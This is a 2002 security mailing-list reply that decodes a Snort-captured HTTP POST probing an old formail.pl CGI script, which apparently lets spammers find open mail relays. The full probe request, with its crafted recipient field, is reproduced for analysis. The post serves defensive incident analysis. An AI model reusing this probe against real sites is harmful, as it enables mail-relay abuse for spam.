Re: new type of formmail probes

From: Kerry Thompson (kerryat_private)
Date: Thu Sep 05 2002 - 14:12:59 PDT

    Hi Russell

    I don't see any fancy unicode or DOS commands in here, so I would say it
    is a relatively harmless probe for open formmail relays, probably for spam
    use. There are a number of automated tools that look for old formail.pl
    programs to exploit as relays. The POST translated to plain text follows (
    the backslash breaks are mine for readability ) :

    POST /cgi-bin/formail.pl HTTP/1.0
    Via: 1.0 SERVER
    Connection: Keep-Alive
    Host: www.cs.auckland.ac.nz
    Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */*
    Referer: www.cs.auckland.ac.nz

    email=daa18at_private&recipient=<iikestyxat_private>www.cs.auckland.ac.nz\
    &subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl              oxy52\
    &=

    time/date: 08:20:19pm / 09/04/2002
    <A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\
    www.cs.auckland.ac.nz/cgi-bin/formail.pl</A>

    oxy52

    It seems to be probing formail and getting it to send an Email back to the
    spammer containing a URL for the vulnerable formail.

    I've checked Google for "oxy52" but found nothing, its probabaly just a
    tag for whoever is receiving the mail.

    Kerry

    Russell Fulton said:
    > Hi All,
    > 	Over the last week or so snort has been picking up many probes like
    > this:

    [snip]

    --
    Kerry Thompson, CISSP